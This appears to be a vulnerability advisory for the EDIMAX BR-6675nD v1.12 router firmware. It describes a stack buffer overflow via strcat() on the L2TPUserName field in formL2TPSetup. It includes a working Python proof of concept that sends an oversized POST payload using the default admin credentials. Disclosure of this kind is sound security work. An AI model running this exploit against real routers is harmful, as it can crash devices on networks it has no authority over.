Overview

• The device's official website: https://download.edimax.com/mw/cufiles/files/download/Firmware/BR6675ND_v1.12(TaiwanOnly).zip

Affected version

BR-6675nD v1.12

Vulnerability details

The EDIMAX BR-6675nD v1.12 firmware has a stack overflow vulnerability in the formL2TPSetup function. The v89 variable receives the L2TPUserName parameter from a POST request. However, since the user can control the input of L2TPUserName, the statement strcat() can cause a buffer overflow.

POC

import requests

ip = "192.168.2.1"

payload = "A"*5000
data = {
    "submit-url":       "",
    "L2TPConnect":      "",
    "L2TPDisconnect":   "",
    "L2TPIpMode":       "0",
    "HostName":         "test",
    "macAddr":          "",
    "enableDuallAccess": "",
    "DUAL_WAN_IGMP":    "",
    "httpProxyEnable":  "",
    "DNSMode":          "1",
    "dns1":             "1.1.1.1",
    "dns2":             "8.8.8.8",
    "dns3":             "",
    "L2TPIPAddr":       "",
    "L2TPMaskAddr":     "",
    "L2TPDefGateway":   "",
    "L2TPGateway":      "",
    "L2TPUserName":     payload,
}

url = f'http://{ip}/goform/formL2TPSetup'

res = requests.post(url=url, data=data, auth=("admin", "1234"), verify=False)
print(res)